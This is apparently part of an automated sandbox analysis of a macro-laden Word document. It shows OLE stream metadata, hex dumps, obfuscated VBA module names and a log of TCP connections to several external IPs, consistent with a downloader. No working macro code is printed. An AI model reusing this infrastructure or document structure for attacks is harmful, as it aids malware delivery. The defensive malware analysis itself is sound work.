Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 49 85 8d 23 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code
`Attribute VB_Name = "Zdjtk46nm17voo"`

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 146

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	146
Entropy:	4.00187355764
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.280929556603
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . # . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 508

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	508
Entropy:	3.93936573804
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 cc 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 54 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6412

General
Stream Path:	1Table
File Type:	data
Stream Size:	6412
Entropy:	6.14518057053
Base64 Encoded:	True
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 99192

General
Stream Path:	Data
File Type:	data
Stream Size:	99192
Entropy:	7.3901039161
Base64 Encoded:	True
Data ASCII:	x . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . . . . . . D . . . . . = . . F . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . .
Data Raw:	78 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 524

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	524
Entropy:	5.52955915132
Base64 Encoded:	True
Data ASCII:	I D = " { 9 1 6 F 7 B 9 1 - 5 D 2 F - 4 2 F E - 8 5 A 0 - A 5 1 0 E E 1 5 7 0 3 4 } " . . D o c u m e n t = A 5 g d 2 1 k l f q u 9 c 6 r s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z d j t k 4 6 n m 1 7 v o o . . M o d u l e = O w p p n p 8 h a h 4 x o 7 8 8 . . E x e N a m e 3 2 = " F b 5 d 3 b h _ _ k e _ c w 4 p 7 7 " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 4 2 6 E E C 5 1 6 F E 1 A F E 1 A F E 1 A F E 1
Data Raw:	49 44 3d 22 7b 39 31 36 46 37 42 39 31 2d 35 44 32 46 2d 34 32 46 45 2d 38 35 41 30 2d 41 35 31 30 45 45 31 35 37 30 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 149

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	149
Entropy:	3.96410774314
Base64 Encoded:	False
Data ASCII:	A 5 g d 2 1 k l f q u 9 c 6 r s . A . 5 . g . d . 2 . 1 . k . l . f . q . u . 9 . c . 6 . r . s . . . Z d j t k 4 6 n m 1 7 v o o . Z . d . j . t . k . 4 . 6 . n . m . 1 . 7 . v . o . o . . . O w p p n p 8 h a h 4 x o 7 8 8 . O . w . p . p . n . p . 8 . h . a . h . 4 . x . o . 7 . 8 . 8 . . . . .
Data Raw:	41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 00 41 00 35 00 67 00 64 00 32 00 31 00 6b 00 6c 00 66 00 71 00 75 00 39 00 63 00 36 00 72 00 73 00 00 00 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 00 5a 00 64 00 6a 00 74 00 6b 00 34 00 36 00 6e 00 6d 00 31 00 37 00 76 00 6f 00 6f 00 00 00 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38 38 00 4f 00 77 00 70 00 70 00 6e 00 70 00 38 00 68

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5216

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	5216
Entropy:	5.49741129349
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 675

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	675
Entropy:	6.39671072877
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . { . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . Q . m . . . . ! O f f i c
Data Raw:	01 9f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 7b 1a e4 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d

Stream Path: WordDocument, File Type: data, Stream Size: 21038

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	21038
Entropy:	4.09747048154
Base64 Encoded:	True
Data ASCII:	. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . M . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . b . . . b . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 19 4d 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 52 00 00 62 7f 00 00 62 7f 00 00 19 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2021 18:44:30.154597998 CET	49165	80	192.168.2.22	172.67.141.14
Jan 7, 2021 18:44:30.200851917 CET	80	49165	172.67.141.14	192.168.2.22
Jan 7, 2021 18:44:30.201436043 CET	49165	80	192.168.2.22	172.67.141.14
Jan 7, 2021 18:44:30.203901052 CET	49165	80	192.168.2.22	172.67.141.14
Jan 7, 2021 18:44:30.250072002 CET	80	49165	172.67.141.14	192.168.2.22
Jan 7, 2021 18:44:30.344028950 CET	80	49165	172.67.141.14	192.168.2.22
Jan 7, 2021 18:44:30.344073057 CET	80	49165	172.67.141.14	192.168.2.22
Jan 7, 2021 18:44:30.344098091 CET	80	49165	172.67.141.14	192.168.2.22
Jan 7, 2021 18:44:30.344122887 CET	80	49165	172.67.141.14	192.168.2.22
Jan 7, 2021 18:44:30.344146013 CET	80	49165	172.67.141.14	192.168.2.22
Jan 7, 2021 18:44:30.344171047 CET	80	49165	172.67.141.14	192.168.2.22
Jan 7, 2021 18:44:30.344188929 CET	80	49165	172.67.141.14	192.168.2.22
Jan 7, 2021 18:44:30.344202042 CET	80	49165	172.67.141.14	192.168.2.22
Jan 7, 2021 18:44:30.344206095 CET	49165	80	192.168.2.22	172.67.141.14
Jan 7, 2021 18:44:30.344218969 CET	80	49165	172.67.141.14	192.168.2.22
Jan 7, 2021 18:44:30.344245911 CET	49165	80	192.168.2.22	172.67.141.14
Jan 7, 2021 18:44:30.344253063 CET	49165	80	192.168.2.22	172.67.141.14
Jan 7, 2021 18:44:30.344265938 CET	49165	80	192.168.2.22	172.67.141.14
Jan 7, 2021 18:44:30.351722956 CET	49165	80	192.168.2.22	172.67.141.14
Jan 7, 2021 18:44:30.397926092 CET	80	49165	172.67.141.14	192.168.2.22
Jan 7, 2021 18:44:30.448654890 CET	49166	80	192.168.2.22	172.67.158.72
Jan 7, 2021 18:44:30.494857073 CET	80	49166	172.67.158.72	192.168.2.22
Jan 7, 2021 18:44:30.494976997 CET	49166	80	192.168.2.22	172.67.158.72
Jan 7, 2021 18:44:30.495342970 CET	49166	80	192.168.2.22	172.67.158.72
Jan 7, 2021 18:44:30.541374922 CET	80	49166	172.67.158.72	192.168.2.22
Jan 7, 2021 18:44:30.559907913 CET	80	49166	172.67.158.72	192.168.2.22
Jan 7, 2021 18:44:30.559976101 CET	80	49166	172.67.158.72	192.168.2.22
Jan 7, 2021 18:44:30.560034037 CET	80	49166	172.67.158.72	192.168.2.22
Jan 7, 2021 18:44:30.560090065 CET	80	49166	172.67.158.72	192.168.2.22
Jan 7, 2021 18:44:30.560107946 CET	49166	80	192.168.2.22	172.67.158.72
Jan 7, 2021 18:44:30.560132027 CET	80	49166	172.67.158.72	192.168.2.22
Jan 7, 2021 18:44:30.560395956 CET	49166	80	192.168.2.22	172.67.158.72
Jan 7, 2021 18:44:30.743870020 CET	49167	80	192.168.2.22	209.59.139.39
Jan 7, 2021 18:44:30.763811111 CET	49166	80	192.168.2.22	172.67.158.72
Jan 7, 2021 18:44:30.903764963 CET	80	49167	209.59.139.39	192.168.2.22
Jan 7, 2021 18:44:30.903878927 CET	49167	80	192.168.2.22	209.59.139.39
Jan 7, 2021 18:44:30.904099941 CET	49167	80	192.168.2.22	209.59.139.39
Jan 7, 2021 18:44:31.064183950 CET	80	49167	209.59.139.39	192.168.2.22
Jan 7, 2021 18:44:31.065102100 CET	80	49167	209.59.139.39	192.168.2.22
Jan 7, 2021 18:44:31.065164089 CET	80	49167	209.59.139.39	192.168.2.22
Jan 7, 2021 18:44:31.065221071 CET	80	49167	209.59.139.39	192.168.2.22
Jan 7, 2021 18:44:31.065274954 CET	49167	80	192.168.2.22	209.59.139.39
Jan 7, 2021 18:44:31.065277100 CET	80	49167	209.59.139.39	192.168.2.22
Jan 7, 2021 18:44:31.065336943 CET	80	49167	209.59.139.39	192.168.2.22
Jan 7, 2021 18:44:31.065383911 CET	49167	80	192.168.2.22	209.59.139.39
Jan 7, 2021 18:44:31.065413952 CET	80	49167	209.59.139.39	192.168.2.22
Jan 7, 2021 18:44:31.065474987 CET	80	49167	209.59.139.39	192.168.2.22
Jan 7, 2021 18:44:31.065489054 CET	49167	80	192.168.2.22	209.59.139.39
Jan 7, 2021 18:44:31.065553904 CET	49167	80	192.168.2.22	209.59.139.39
Jan 7, 2021 18:44:31.065936089 CET	49167	80	192.168.2.22	209.59.139.39
Jan 7, 2021 18:44:31.226799965 CET	80	49167	209.59.139.39	192.168.2.22
Jan 7, 2021 18:44:31.441131115 CET	49168	80	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:31.765343904 CET	80	49168	45.130.229.91	192.168.2.22
Jan 7, 2021 18:44:31.765746117 CET	49168	80	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:31.765779018 CET	49168	80	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:32.090040922 CET	80	49168	45.130.229.91	192.168.2.22
Jan 7, 2021 18:44:32.090152979 CET	80	49168	45.130.229.91	192.168.2.22
Jan 7, 2021 18:44:32.292649984 CET	49168	80	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:32.460905075 CET	49169	443	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:32.770035028 CET	443	49169	45.130.229.91	192.168.2.22
Jan 7, 2021 18:44:32.770140886 CET	49169	443	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:32.778253078 CET	49169	443	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:33.087449074 CET	443	49169	45.130.229.91	192.168.2.22
Jan 7, 2021 18:44:33.087608099 CET	443	49169	45.130.229.91	192.168.2.22
Jan 7, 2021 18:44:33.087630033 CET	443	49169	45.130.229.91	192.168.2.22
Jan 7, 2021 18:44:33.087855101 CET	49169	443	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:33.096090078 CET	49169	443	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:33.096921921 CET	49170	443	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:33.405308008 CET	443	49169	45.130.229.91	192.168.2.22
Jan 7, 2021 18:44:33.405762911 CET	443	49170	45.130.229.91	192.168.2.22
Jan 7, 2021 18:44:33.405915976 CET	49170	443	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:33.406655073 CET	49170	443	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:33.715532064 CET	443	49170	45.130.229.91	192.168.2.22
Jan 7, 2021 18:44:33.715612888 CET	443	49170	45.130.229.91	192.168.2.22
Jan 7, 2021 18:44:33.715711117 CET	443	49170	45.130.229.91	192.168.2.22
Jan 7, 2021 18:44:33.715851068 CET	49170	443	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:33.719151020 CET	49170	443	192.168.2.22	45.130.229.91
Jan 7, 2021 18:44:34.028208971 CET	443	49170	45.130.229.91	192.168.2.22
Jan 7, 2021 18:44:34.041439056 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.305519104 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.305840015 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.306168079 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.569840908 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.578701019 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.578767061 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.578810930 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.578849077 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.578888893 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.578948021 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.578979015 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.579030037 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.579071999 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.579102039 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.579128027 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.579128981 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.579134941 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.579139948 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.579806089 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.843252897 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843312979 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843352079 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843436956 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843527079 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843547106 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.843574047 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843605995 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.843626022 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843668938 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843710899 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.843713999 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843753099 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843782902 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.843797922 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843853951 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843899965 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843903065 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.843945026 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.843970060 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.843992949 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.844047070 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.844094038 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.844132900 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.844161987 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.844177008 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.844177961 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.844219923 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:34.844252110 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:34.844491959 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.108216047 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108248949 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108290911 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108345985 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108392000 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108393908 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.108431101 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.108443975 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108485937 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108503103 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108505964 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.108532906 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108565092 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.108582020 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108608961 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108628035 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.108647108 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108680010 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108707905 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.108711958 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108772993 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108774900 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.108795881 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108844042 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108844995 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.108879089 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108902931 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108925104 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108935118 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.108947992 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108973980 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.108997107 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109015942 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.109019041 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109025002 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.109030962 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.109050989 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109061956 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109071970 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.109081030 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109105110 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109111071 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.109127045 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109148979 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109170914 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109193087 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109194040 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.109206915 CET	49171	80	192.168.2.22	210.86.239.69
Jan 7, 2021 18:44:35.109222889 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109245062 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109270096 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109293938 CET	80	49171	210.86.239.69	192.168.2.22
Jan 7, 2021 18:44:35.109298944 CET	49171	80	192.168.2.22	210.86.239.69
